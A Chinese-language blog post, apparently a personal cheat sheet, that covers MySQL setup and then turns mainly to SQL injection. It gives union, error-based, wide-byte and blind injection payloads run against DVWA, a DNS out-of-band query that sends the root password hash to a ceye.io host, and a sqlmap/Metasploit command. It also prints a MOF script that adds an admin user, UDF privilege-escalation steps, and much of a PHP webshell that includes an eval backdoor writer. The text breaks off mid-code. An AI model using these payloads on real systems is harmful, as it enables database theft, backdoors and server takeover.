MySQL小结


title: MySQL小结
date: 2020-04-08 16:15:30
tags:

  • MYSQL
  • 总结
  • 漏洞
    categories: 知识整理

toc: true

Web程序代码中对于用户提交的参数未做过滤就直接放到SQL语句中执行,导致参数中的特殊字符打破了SQL语句原有逻辑,黑客可以利用该漏洞执行任意SQL语句。

MySQL安装及配置

Mysql安装(这里版本为8.0.17)

  • 第一步:下载Mysql

地址:https://dev.mysql.com/downloads/mysql/

  • 第二步:配置Mysql环境变量

将下载的mysql文件夹bin目录加入环境变量,D:\mysql\bin

  • 第三步:安装mysql

首先执行mysqld --initialize-insecure(自动生成无密码Root用户),然后以管理员的权限执行CMD:mysqld install,即可完成安装。

  • 第四步:启动/停止mysql

net start mysql

net stop mysql

登陆MySQL及配置密码

  • 登陆MySQL(这里创建的是无密码root)

mysql -u root -p,提示输入密码时候无需输入,回车即可。

  • 更改Mysql密码

ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'RootPwd@123456';

flush privileges;

  • 开启mysql远程

查看是否支持远程: select host ,user from user;

第一种:update user set host ='%' where user='root';

第二种:grant all privileges on *.* to 'root'@'%' identified by '123456' with grant option;

MySQL命令学习

  • 有关查看数据库相关信息的命令:

select @@version查看当前MySQL版本

select user(); / select system_user();/select session_user();查看当前用户

select database();查看当前数据库

select connection_id();返回当前客户的连接ID

select now()查看系统当前时间

select @@basedir;查看Mysql的安装路径

select @@datadir;查看数据库安装路径

show databases;查看当前MySQL所有库名

mysqldump -u root -p --default-character-set=UTF8 [database] [table] > dump.txtMysql导出位.txt

mysql -u root -p --default-character-set=UTF8 database_name < dump.txt导入

  • 一些命令

use <database_name>使用某个数据库,需指定库名

show tables;查看当前数据库的数据库表

select * from users; 查询users表中所有的数据

select first_name from users;查询users表中first_name字段的所有内容

select concat(user,0x3C,password) from users; concat连接字符串函数

select group_concat(user,0x3C,password) from users;将user,password字段所有内容连接成一个字符串

实践:

select * from users limit m,n;查询user表中数据,输出第m(代表下标,下标都是从0开始)条开始的n条数据

select concat(user,0x3c,password) from users limit 3,2;将users表中user、password字段第四、五条数据用<号连接,输出

  • 一些高级命令

select mid(user(),2,3);mid字符串截取,截取当前用户名第二个字符开始的三个字符

select substr(user(),2,3);subsets字符串截取,截取当前用户名第二个字符开始的三个字符

select ord(mid(database(),3,1));/select ord(substr(database(),3,1));查询当前库名的第三个字符的ASCII

select ascii('s');查询s的ASCII值,同ord

select char(97);将ASCII值转为字符串

select count(*) from users;查询users表中数据条数

select length(user());查询当前用户名长度

select sleep(2);延时两秒返回数据

select * from users order by user;根据字段名排序(拓展:order by 8执行正常,order by 9报错,证明字段个数只有八个)

select password from users where user_id=2 or user_id=3;查询users表中user_id为2和3的password字段的值

增删改查

  • 增加一条数据

需要匹配users表中字段个数,如果字段不匹配会报错;如果字段内容限定为not NUll,字段为空时也报错。

insert into users values('9','test','test','test123','ssss','lujing','2019','2020');

  • 修改数据

update users set user='ccc' where password='ssss';将password为ssss的那条数据的user字段内容更新为ccc;多条数据用逗号隔开 set user='ccc',user_id='20'

  • 删除数据

delete from users where user_id=9;删除users表中user_id为9的那条数据

drop table users;删除users表

drop database dvwa;删除dvwa库

Mysql数据去重

(找了半天,只能将查询结果导入到另外一张表中了。。。)

  • 利用distinct进结果去重,然后将查询的结果导入到另外一张表中。

insert ignore into user_info select distinct name,sex,id_card,tel,address,mail from users_room;

SQL注入可能用到的语法

基础:

  • 基于and/or判断注入点

首先判断页面正常返回。

然后select user,password from users where user_id=2 and 1=1;正确执行(and两边表达式均成立,返回为真)页面正常返回

select user,password from users where user_id=2 and 1=2;返回为空(and两边表达式一真一假,返回为假)页面返回错误或者不正常

即可证明SQL存在

OR同理—>

select user,password from users where user_id=2 or 1=1;返回所有user和password的内容(or两边表达式都为真且1=1恒成立,则返回所有)

select user,password from users where user_id=2 or 1=2;仅返回一条数据(1=2不成立,因此只返回user_id=2的那条数据指定的内容)

注意:and 1=1 并非绝对,只要是表达式,类似于's'='s'等等,,,,

判断SQL注入存在,需要三个页面对比才行。

  • 注入点的多种情况

select user, password from users where user_id='2';如果源于句,使用了引号将ID值扩起来,需要构造如下:where user_id='2' and '1'='1,也即是2' and '1'='12' and '1'='2

同理,如果使用双引号,括号扩起来的,也需要按照上面的情况。(如果where user_id=('1')这样呢?)

试一试:2',2''?

  • SQL注入的原理

就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

高级查询语法

  • 查询结果排序

select * from users order by last_name;查询users表中的所有数据,并使用last_name字段内容排序(根据的是ASXCII码)

可以利用select * from users order by N;判断users表字段个数,N小于等于字段数正常返回数据,大于则报错。

-- -,#在数据库中表示注释之后的内容,/**/表示多行注释,注释掉扩起来的内容

select * from users order by last_name#asdasdas;

select * from users order by last_name-- -asadasdas;

多行注释也可以用于行内:select * from users/**/order/*ssssss*/by last_name;

其他几个排序:

降序排列查询结果:select * from users DESC;

升序(默认排序):select * from users ASC;

  • 组合查询

一个查询中从不同的表返回结果数据

在一个表中执行多个查询,按一个查询返回数据

select user, password from users where user_id='2' union select last_name, first_name from users where user_id='4'

查询user_id=2的use,password字段内容,查询user_id=4的last_name,first_name字段的值,一起返回(也即是同时返回。。。)

  • 模糊查询

关键词like,通配符%,*,.等,常用的正则规则字符。

select * from users where avatar like '%hac%'匹配users表中avatar字段中含有hac的内容

"*"表示匹配零个或多个在它前面的东西。例如,"D*"匹配任何数量的"D"字符

"." 匹配任何单个的字符。

当使用正则匹配时,使用REGEXP和NOT REGEXP操作符(或RLIKE和NOT RLIKE,功能是一样的)

  • 模糊查询中的注入:

select * from users where avatar like '%hac%' union select password from users;首先查询avatar字段中包含hac的数据,然后查询users表中的password字段内容,然后组合起来返回(会去重)

  • 一些事项:

select user_id from users union select password from users;正常执行(组合查询时候,前后查询的字段数要一样,这样就是错误的:select user_id from users union select password,user from users;)

SQL注入示例

题目:where user_id=2处存在注入点,要求判断注入点并查询到user,password字段内容。

源于句:select user_id from users where user_id=2;

解:

  1. select user_id from users where user_id=2 and 1=1-- -;正常
  2. select user_id from users where user_id=2 and 1=2-- -;不正常,结合起来判断存在注入点
  3. select user_id from users where user_id=2 order by 1-- -;正常
  4. select user_id from users where user_id=2 order by 2-- -错误,证明只有一个字段(在使用的user_id)
  5. select user_id from users where user_id=2 union select 1-- - 1为占位符,填充使用
  6. select user_id from users where user_id=2 union select database()-- -替换占位符,可以查询一些常用信息(版本,数据库名,用户名,路径等)
  7. select user_id from users where user_id=2 union select concat(user,0x3c,password) from users-- -(使用concat连接user,password一起输出,就不用连续使用union select)

Mysql系统表利用

infomation_schema说明

MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权 限等。在INFORMATION_SCHEMA中,有数个只读表。它们实际上是视图,而不是基本表,因此,你将无法看到与之相关的任何文件。

information_schema数据库表说明:

  • SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。
  • TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果取之此表。
  • COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。
  • STATISTICS表:提供了关于表索引的信息。是show index from schemaname.tablename的结果取之此表。
  • USER_PRIVILEGES(用户权限)表:给出了关于全程权限的信息。该信息源自mysql.user授权表。是非标准表。
  • SCHEMA_PRIVILEGES(方案权限)表:给出了关于方案(数据库)权限的信息。该信息来自mysql.db授权表。是非标准表。
  • TABLE_PRIVILEGES(表权限)表:给出了关于表权限的信息。该信息源自mysql.tables_priv授权表。是非标准表。
  • COLUMN_PRIVILEGES(列权限)表:给出了关于列权限的信息。该信息源自mysql.columns_priv授权表。是非标准表。
  • CHARACTER_SETS(字符集)表:提供了mysql实例可用字符集的信息。是SHOW CHARACTER SET结果集取之此表。
  • COLLATIONS表:提供了关于各字符集的对照信息。
  • COLLATION_CHARACTER_SET_APPLICABILITY表:指明了可用于校对的字符集。这些列等效于SHOW COLLATION的前两个显示字段。
  • TABLE_CONSTRAINTS表:描述了存在约束的表。以及表的约束类型。
  • KEY_COLUMN_USAGE表:描述了具有约束的键列。
  • ROUTINES表:提供了关于存储子程序(存储程序和函数)的信息。此时,ROUTINES表不包含自定义函数(UDF)。名为“mysql.proc name”的列指明了对应于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列。
  • VIEWS表:给出了关于数据库中的视图的信息。需要有show views权限,否则无法查看视图信息。
  • TRIGGERS表:提供了关于触发程序的信息。必须有super权限才能查看该表

https://blog.csdn.net/demonson/article/details/80388677(MySQL information_schema 详解)

information_schema使用示例

  • 获取表名
select 1,table_name from information_schema.tables where table_schema=(数据库名十六进制) limit 2,1-- - # 当前数据库所有表,使用limit n,1 逐条输出。
  • 判断表的数量
(select count(table_name) from information_schema.tables where table_schema =database())=2-- -  # 判断表的数量为2
  • 获取字段名
select 1,column_name from information_schema.columns where table_name=0x7573657273 limit 1,1-- -
length((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema =database() limit 0,1)limit 0,1)=10-- -
  • 组合语句
length((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema =database() limit 0,1)limit 0,1))=10-- -

MySQL注入基础

常用系统函数

示例:select database();查询当前数据库名称
➢ 1.system_user() 系统用户名
➢ 2.user() 用户名
➢ 3.current_user() 当前用户名
➢ 4.session_user() 链接数据库的用户名
➢ 5.database() 数据库库名
➢ 6.version() mysql 数据库版本信息
➢ 7.load_file() 转换成16 或10 进制 读取本地文件
➢ 8.@@datadir 读取数据库路径
➢ 9.@@basedir MYSQL 安装路径
➢ 10.@@version_compile_os

常用关键字/函数

limit m,n     # 从m开始检索n条数据
select mid(database(),2,1) # 用于得到当前数据库名的第二个字符
select ord(mid(user(),1,1))= 114  # ord函数返回字符串第一个字符的 ASCII 值。
select concat(1,0x3c,2)    # 将字符串1和2用<连接起来   输出为:1<2
select sleep(2)    # 结果在两秒钟后返回,可理解为暂停2秒
select length(user())  # 当前用户名长度  length()  长度函数
select substr(user(),2,1)     # 从第二个字符开始截取一个字符长度,这里为o
IF(expr1,expr2,expr3)     # expr1 是TRUE则IF()的返回值为expr2; 否则返回值则为 expr3
select count(user) from users  # 查询users表中user字段所有数据的 个数

系统表简介

Information_schema数据库是MySQL自带的,它提供了访问数据库元数据的方式。什么是元数据呢?元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。有些时候用于表述该信息的其他术语包括“数据词典”和“系统目录”。

该库有多个表其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。

更多介绍:https://blog.csdn.net/Touatou/article/details/80775601

显性注入

经过在线DVWA http://43.247.91.228:81测试(介绍基础,所以选择Low级别),在线的级别调不好,请本地搭建。

源码:

<?php     

if(isset($_GET['Submit'])){ 
     
    // Retrieve data 
     
    $id = $_GET['id']; 

    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; 
    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); 

    $num = mysql_numrows($result); 

    $i = 0; 

    while ($i < $num) { 

        $first = mysql_result($result,$i,"first_name"); 
        $last = mysql_result($result,$i,"last_name"); 
         
        echo '<pre>'; 
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; 
        echo '</pre>'; 

        $i++; 
    } 
} 
?>

重点看源码中:SELECT first_name, last_name FROM users WHERE user_id = '$id'

漏洞产生原因:SQL语句未经过处理,直接将传入的$id当做参数执行。(这里不进行 or 1=1之类的测试)

构造语句进行解释:user_id='$id',如果传入的$id值为1' order by 5-- -,源语句变成了:

user_id='1’ order by 5-- -',在数据库中是可以正常执行的。

当num为2时, 也就是user_id='1’ order by 2-- -正常执行,为3时报错,说明当前库的users表有两个字段。

开始注入

这里数据库版本大于5.0,测试的是字符型,因此是 ' and '1'='1',省略 1'

这里并非直接获取密码啊,什么的,仅仅展示可能用到了的语句。

  • 开始注入之前,获取有用信息:
order by 2-- - # 获取当前数据库,所使用表的字段长度,-- - 表示注释之后的内容
and '1'='1' union select 1,2-- -  # 匹配字段
and '1'='2' union select 1,2-- -  # 爆字段位置,也即是可用字段,这里都可以
# 这时候就可以使用mysql系统函数来测试。

and '1'='1' union select 1,ord(mid(user(),1,1))=114-- -# 正常返回证明当前数据库用户为r开头一般为root.
and '1'='1' union select 1,ord(mid(user(),2,1))=111-- -# 正常返回证明当前数据库用户第二个字符为o
...
  • 获取数据库表名:
获取表名源语句:
and '1'='1' union select 1,table_name from information_schema.tables where table_schema=(数据库名十六进制) limit 2,1-- - # 当前数据库所有表,使用limit n,1 逐条输出。

注入语句:
and '1'='1' union select 1,table_name from information_schema.tables where table_schema=0x64767761 limit 2,1-- -  
  • 获取字段名
原理同获取表名。
and '1'='1' union select 1,column_name from information_schema.columns where table_name=0x7573657273 limit 1,1-- -
  • 获取字段内容
# 已经爆出表名和字段名,直接查询即可
and '1'='1' union select user,password from users-- -
# 上语句有两个可用注入字段,如果只有一个呢?

# 第一种方式,挨个爆,先爆名字,再爆密码
and '1'='1' union select 1,user from users-- -

# 第二种方式,使用concat函数将字符串连接起来
and '1'='1' union select 1,concat(user,0x3c,password) from users-- - 
# `0x3c`为`<`,这里将user、password用`<`连接起来。输出格式为:pablo<0d107d09f5bbe40cade3de5c71e9e9b7

至此,已经爆出数据库中可用的账号密码,非root。类似于XXX系统的用户/管理员账号密码。脱裤子的话请绕行- -

MySQL函数报错

Floor

当使用 floor,rand,group by 连用时候会报错。利用报错,使用concat连接,可以实现注入。

select concat(floor(rand(0)*2), '===='),count(1) from users group by user_id;

输出:

+----------------------------------+----------+
| concat(floor(rand(0)*2), '====') | count(1) |
+----------------------------------+----------+
| 0====                            |        1 |
| 1====                            |        1 |
| 1====                            |        1 |
| 0====                            |        1 |
| 1====                            |        1 |
select concat(floor(rand(0)*2), '====',(select user())),count(1) from users group by user_id;

输出:

+--------------------------------------------------+----------+
| concat(floor(rand(0)*2), '====',(select user())) | count(1) |
+--------------------------------------------------+----------+
| 0====root@localhost                              |        1 |
| 1====root@localhost                              |        1 |
| 1====root@localhost                              |        1 |
| 0====root@localhost                              |        1 |
| 1====root@localhost                              |        1 |
+--------------------------------------------------+----------+

updatexml

updatexml() //5.1.5
and 1=(updatexml(1,concat(0x3a,(select user())),1))
select * from users where user_id=1 and 1=(updatexml(1,concat(0x3a,(select database())),1));

报错:

ERROR 1105 (HY000): XPATH syntax error: ':dvwa'
select * from users where user_id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1));

报错:

ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

extractvalue

extractvalue() //5.1.5
and extractvalue(1,concat(0x5c,(select user())))

select * from users where user_id=1 and extractvalue(1,concat(0x3a,(select database())));

ERROR 1105 (HY000): XPATH syntax error: ':dvwa'

exp

exp() //5.5.5版本之后可以使用

select host from user where user = 'root' and Exp(~(select * from (select version())a));

name_const

name_const //支持老版本

select * from (select NAME_CONST(version(),0),NAME_CONST(version(),0))x;

几何函数

geometrycollection(),multipoint(),polygon(),multipolygon(),linestring(),multilinestring()

select multipoint((select * from (select * from (select * from (select version())a)b)c));

宽字节

参考:

MYSQL client链接编码的锅

show variables like '%character%'

由于编码不一致,导致的问题,主要是汉字占用了3个字节。关键字%df,当客户端连接编码设置为GBK的时候 与php进行交互的时候就会出现字符转换 导致单引号逃逸的问题。

测试payload: `index.php?id=%df%27`

MYSQL iconv函数 mb_convert_encoding函数的锅
借用先知: $id =iconv('GBK','UTF-8', $id)
%df%27===(addslashes)===>%df%5c%27===(iconv)===>%e5%5c%5c%27
其实就是 utf8 -> gbk ->utf-8 低位的%5c 也就是反斜杠干掉了转义单引号的反斜杠。

Big5编码导致的宽字节注入

猜测代码: iconv('utf-8','BIG5',$_GET['id'])
payload构造同上: 功' -> addsalshes -> 功' -> iconv -> %A5%5C%5C%27->¥' 逃逸单引号
%E8%B1%B9'

SQL盲注

这里包含了Bool和Time类型

开始注入

本地搭建的DVWA,在线的显性注入出了点问题,就本地搭建了。

这里测试使用了=号,为了直观,真实环境协同使用<>快速判断

仔细观察通过长度和返回时间两种方式,下文对时间的不过多说了

  • 判断数据库名长度
# 第一种,通过长度
and length(database())=4-- -   # 正常返回 说明当前用户名长度为 14 ,我这里是:root@localhost

# 第二种通过返回时间判断,如果网络较差,建议多设置几秒。
and if(length(database())=4,sleep(5),1)-- -  # 如果数据库名长度为4则延时5秒返回结果
  • 判断数据库名称
# 只能挨个字符判断,这里值猜不到数据库名的情况下,挨个字符判断
# 第一种,通过ASCII值判断,判断正确返回正常页面,
and ascii(substr(database(),1,1))=100-- - # 第1个字符开始,1为截取字符长度

# 第二种,通过返回时间
and if(ascii(substr(database(),1,1))=100,sleep(3),1)-- -
  • 判断数据库表名
# 猜表的数量,因为不知道数据库结构,只能慢慢猜,这个根据自己需求,非必须
and (select count(table_name) from information_schema.tables where table_schema =database())=2-- -  # 判断表的数量为2
# 基于返回时间
and if((select count(table_name) from information_schema.tables where table_schema =database())=2, sleep(3),1)-- -

# 猜表名的长度,这里注意是length((exp1))=9,用括号将查询内容括起来
and length((select table_name from information_schema.tables where table_schema =database() limit 0,1))=9-- -
# 通过limit 1,1遍历表名长度, limit n,1   n从0开始,0表示第一个表

# 基于时间的不在写了。

# 猜第一个表的第一个字母,这里substr((exp1),1,1)=103,用括号将查询内容括起来
and ascii(substr((select table_name from information_schema.tables where table_schema =database() limit 0,1),1,1))=103-- -
# 上语句简析:ascii( substr(exp1,1,1) )=103
# exp1 = select table_name from information_schema.tables where table_schema =database() limit 0,1

# 基于时间的不再写了。

通过limit控制查询的表,通过substr截取表名字符串,挨个判断值

  • 判断字段名

原理和判断表名一样

# 首先来个嵌套的,这里不用获取表名,可以直接得到字段长度、值。
# 这里获取的是第一个表的第一个字段的长度
# 通过第二个limit来控制查询字段。
and length((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema =database() limit 0,1)limit 0,1))=10-- -

# 第二种,根据前面的表名,使用如下语句,十六进制数据为:表名的十六进制。
and length((select column_name from information_schema.columns where table_name=0x6775657374626F6F6B limit 0,1))=10-- -

# 基于时间的就不再写了。也就是 if(length()=2,sleep(2),1)这种


# 求值第一个表的第一个字段的第一个字母
and ascii(substr((select column_name from information_schema.columns where table_name=0x6775657374626F6F6B limit 0,1),1,1))=99-- -

# 嵌套求第一个表的第一个字段的第一个字母
and ascii(substr((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema =database() limit 0,1)limit 0,1),1,1))=99-- -
  • 判断字段内容
# 其实有了表名和字段名,可以直接查询的。先获取长度再获取值。
and length((select comment_id from guestbook))=1-- -

# 获取值
and ascii(substr((select comment_id from guestbook),1,1))=49-- -
# 基于时间的
and if(ascii(substr((select comment_id from guestbook),1,1))=49,sleep(3),1)-- -

到此,盲注的基本方法已经完成

DNSLOG

有时候注入发现并没有回显,也不能利用时间盲注,那么就可以利用带外通道,也就是利用其他协议或者渠道,如http请求、DNS解析、SMB服务等将数据带出。

SELECT LOAD_FILE(CONCAT('\\\\',( SELECT DATABASE() ),'.xx.xx\\x));

# ceye
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.xxx.ceye.io\\abc'));

条件:

  • mysql.ini 中 secure_file_priv 必须为空

mysql 新版本下secure-file-priv字段 : secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。

当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出

当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下

当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制
  • 从payload看出load_file的路径是windows下的UNC路径,所以mysql带外注入只能发生在windows机器上

MySQL提权

SQLMap+MSF

已知用户名密码情况下,利用Sqlmap结合MSF进行提权。(需要对目录有写权限)

sqlmap -d mysql://admin:123456@10.52.95.209:3306/mysql --os-pwn --msf-path /opt/metasploit-framework/

MOF提权

简介:mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。

必备命令

所需要的SQL语句select load_file('D:\wamp\xishaonian.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

必备脚本

 # pragma namespace("\\\\.\\root\\subscription") 

instance of __EventFilter as $EventFilter 
{ 
 EventNamespace = "Root\\Cimv2"; 
 Name  = "filtP2"; 
 Query = "Select * From __InstanceModificationEvent " 
         "Where TargetInstance Isa \"Win32_LocalTime\" " 
         "And TargetInstance.Second = 5"; 
 QueryLanguage = "WQL"; 
}; 

instance of ActiveScriptEventConsumer as $Consumer 
{ 
 Name = "consPCSV2"; 
 ScriptingEngine = "JScript"; 
 ScriptText = 
 "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")"; 
}; 

instance of __FilterToConsumerBinding 
{ 
 Consumer   = $Consumer; 
 Filter = $EventFilter; 
};

UDF提权

这里的前提是已经上传了udf.dll,如果没有写入权限,emmm,,,我不肥了。。

注意事项:

  • mysql<5.2版本的将.dll文件导入到c:windows 或者c:windowssystem32 目录下。
  • mysql>5.2版本的将.dll文件导入到/MySQL/lib/plugin/ mysql安装目录下。
  • 如果报错内容为:The MySQL server is running with the --secure-file-priv option so it cannot execute this statemen请在MySQL配置文件my.ini文件的[mysqld]选项内加入secure_file_priv =然后重启mysql服务。。
  • 如果报错--secure-file-priv 又无法修改my.ini,则没有办法。

详情参考:--secure-file-priv 特性

手动UDF提权

制作udf.dll

SQLMAP下路径:

/usr/local/Cellar/sqlmap/1.4.3/libexec/data/udf/mysql/windows/64
/usr/local/Cellar/sqlmap/1.4.3/libexec/extra/cloak

python2 cloak.py -d -i lib_mysqludf_sys.dll_
# 即可在当前目录下生成  lib_mysqludf_sys.dll

利用 1

  • 查看plugin目录show variables like '%plugin%';

提示:由于MySQL>5.2版本后,在其安装目录的lib目录下没有 plugin 目录,所以,我们得新建这个目录,并且将我们的 udf.dll 文件放入 plugin目录下,我们执行下面命令,使用NTFS ADS流创建 plugin

select 'xxxxxx' into dumpfile 'C:\\Program\ Files\\MySQL\\MySQL\ Server\ 5.4\\lib\\plugin::$INDEX_ALLOCATION'
  • 导出UDF(也即是将之前生成的lib_mysqludf_sys.dll上传到目标文件夹)
  • 创建函数:CREATE FUNCTION shell RETURNS STRING SONAME 'lib_mysqludf_sys.dll'

注意:如果创建函数时报错,请根据lib_mysqludf_sys.dll中的函数创建。

利用2

利用交互式的SHELL,mysql -uroot -pxxx无法继续交互,需要参数e解决这个问题。

mysql -uroot -pxxxxxxxx mysql -e "create table a (cmd LONGBLOB);"
mysql -uroot -pxxxxxxxx mysql -e "insert into a (cmd) values
(hex(load_file('C:\\xxxx\\xxxx.dll')));"
mysql -uroot -pxxxxxxxx mysql -e "SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\xxxx.dll';"
mysql -uroot -pxxxxxxxx mysql -e "CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'"
mysql -uroot -pxxxxxxxx mysql -e "select shell('cmd','C:\\xxxx\\xxx\\xxxxx.exe');"

如没有指定database,将会出现错误,而使用UNION,将不会有回显,一定出现问
题,将会很难定位,故选择以mysql.x的方式指定。

mysql -uroot -pXXXXXX -e "create table mysql.a (cmd LONGBLOB);"
mysql -uroot -pXXXXXX -e "insert into mysql.a (cmd) values
(hex(load_file('D:\\XXXXXXXXXX\\mysql5\\lib\\plugin\\u.dll')));"
mysql -uroot -pXXXXXX -e "SELECT unhex(cmd) FROM mysql.a INTO DUMPFILE
'D:/XXXXXXXXXX/mysql5/lib/plugin/uu.dll';"
mysql -uroot -pXXXXXX -e "CREATE FUNCTION shell RETURNS STRING SONAME 'uu.dll'"
mysql -uroot -pXXXXXX -e "select shell('cmd','whoami');" 

UDF提权大马

可以使用T00ls udf.php

<?php
//t00ls...................
session_start();?>
<html>
<head>
<title>T00ls UDF.PHP</title>
<style type="text/css">
input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
</style>
<script type="text/javascript">
function outfile(){
    document.getElementById("sql2").value= unescape("select%20%27%3C%3Fphp%20eval%28%24_POST%5B%5C%27pass%5C%27%5D%29%3F%3E%27%20into%20outfile%20%27d%3A%5C%5Cninty.php%27");
}
function loadfile(){
    document.getElementById("sql2").value = unescape("select%20load_file%28%27c%3A%5C%5Cboot.ini%27%29");
}
</script>
</head>
<body>
<?php
error_reporting(0);
if (isset($_REQUEST['action']))
    $action = $_REQUEST['action'];
else
    $action = 'vConn';
switch ($action) {
    case 'vConn':
        vConn();
        break;
    case 'conn':
        conn();
        break;
    case 'exec':
        execsql();
        break;
    case 'install':
        install();
        break;
    case 'copy':
        cp();
        break;
    case 'cplug':
        cplug();
        break;
    case 'logout':
        logout();
        break;
    case 'func':
        func();
        break;
}
function vConn() {
    echo 'by ninty http://www.t00ls.net/<form action="" method="post"><table><input type="hidden" name="action" value="conn">
<tr><td>ip:</td><td><input type="text" name="host" value="localhost"></td></tr><tr><td>uid:</td><td><input type="text" value="root" name="uid"></td></tr><tr><td>pwd:</td><td><input type="text" name="pwd"></td></tr><tr><td>db:</td><td><input type="text" name="db" value="mysql"></td></tr><tr><td><input type="submit"/></td><td>&nbsp;</td></tr></table></form>';
}
function func(){
    $conn = conn(false);
    mysql_select_db('mysql',$conn);
    mysql_query('CREATE TABLE `func` ( `name` char(64) collate utf8_bin NOT NULL default \'\', `ret` tinyint(1) NOT NULL default \'0\', `dl` char(128) collate utf8_bin NOT NULL default \'\', `type` enum(\'function\',\'aggregate\') character set utf8 NOT NULL, PRIMARY KEY (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT=\'User defined functions\'');
    if (mysql_errno($conn) != 0) {
        echo mysql_error() . '<br/>';
    }
    echo 'Create mysql.func success !';
    mysql_close($conn);
}
function conn($close = true) {
    if (isset($_SESSION['host'])) {
        $host = $_SESSION['host'];
        $uid = $_SESSION['uid'];
        $pwd = $_SESSION['pwd'];
        $db = $_SESSION['db'];
    } else {
        $host = $_POST['host'];
        $uid = $_POST['uid'];
        $pwd = $_POST['pwd'];
        $db = $_POST['db'];
    }
    $conn = mysql_connect($host,$uid,$pwd);
    if (!$conn) {
        echo mysql_error().'<br/>';
        vConn();
        exit();
    } 
    mysql_select_db($db,$conn);
    if (mysql_errno($conn) != 0) {
        echo mysql_error().'<br/>';
        vConn();
        exit();
    }
    $_SESSION['host'] = $host;
    $_SESSION['uid'] = $uid;
    $_SESSION['pwd'] = $pwd;
    $_SESSION['db'] = $db;
    //mysql_query('set names utf8');
    showM($conn,$close);
    return $conn;
}
function logout(){
    unset($_SESSION['host']);
    unset($_SESSION['uid']);
    unset($_SESSION['pwd']);
    unset($_SESSION['db']);
    unset($_SESSION['notsame']);
    unset($_SESSION['over51']);
    unset($_SESSION['plugindir']);
    $url = $_SERVER['PHP_SELF']; 
    $filename = end(explode('/',$url));  
    echo '<script>location.href = "'.$filename.'?rn="+Math.random()</script>';
}
function showM(&$conn,$close = true){
    echo '<center><b>t00ls UDF.PHP</b></center>';
    echo '<form action="" method="post"><input type="hidden" name="action" value="logout"><input type="submit" value="Logout"></form>';
    echo '<div style="border:solid 1px #333;background-color:#999;padding:4px">';
    $sql = 'select concat(\'<b>user()</b>:\',user()) as m union select concat(\'<b>database():</b>\',database()) union select concat(\'<b>datadir</b>:\',@@datadir) union select concat(\'<b>basedir</b>:\',@@basedir) union select concat(\'<b>version()</b>:\',version()) ;';
    $meta = mysql_query($sql,$conn);
    $tmp = 1;
    while ($row = mysql_fetch_array($meta,MYSQL_ASSOC)) {
        echo $row['m'];
        if ($tmp == 1) {
            $tmp = 2;
            $h = substr($row['m'],strpos($row['m'],'@')+1);
            if ($h != 'localhost') {
                echo ' <b><i><font color=green>[web and db is not the same server.]</font></i></b>';
            $_SESSION['notsame'] = 'true';
            }
        }
        echo '<br/>';
    }
    echo '<b>plugin_dir</b>:';
    $meta = mysql_query('show variables like "plugin_dir"');
    if (mysql_num_rows($meta)==0) {
        echo '<font color=white>mysql is under 5.1 , ';
        if (!isset($_SESSION['notsame']))
            echo ' u can dump udf.dll to any directory in follow paths';
        echo '</font>';
    } else {
        //over 5.1
        $_SESSION['over51'] = 'true';
        $row = mysql_fetch_row($meta);
        $_SESSION['plugindir'] = str_replace('\\','\\\\',str_replace('/','\\',$row[1])).'\\\\udf.dll';
        echo '<font color=white>'.str_replace('/','\\',$row[1]).'</font>';
        echo ' (mysql over 5.1, udf.dll can only dump to plugin_dir) ';
        if (isset($_SESSION['notsame'])) 
            echo ' <font><b><i>[maybe dump dll will be failed!]</i></b></font>';
        else {
            if (!file_exists(str_replace('/','\\',$row[1]))) 
                echo ' <a href="?action=cplug&dir='.base64_encode(str_replace('/','\\',$row[1])).'">Create PluginDir</a>';
            else 
                echo ' exists!';
        }
    }
    echo '<br/>';
    if (!isset($_SESSION['notsame']) && !isset($_SESSION['over51']))
        echo '<b>path</b>:<font color=green><b>'.getenv('path').'</b></font><br/>';
     $meta = mysql_query('select 1,1,1,1 from mysql.user union select * from mysql.func');
    if (mysql_num_rows($meta)==0)
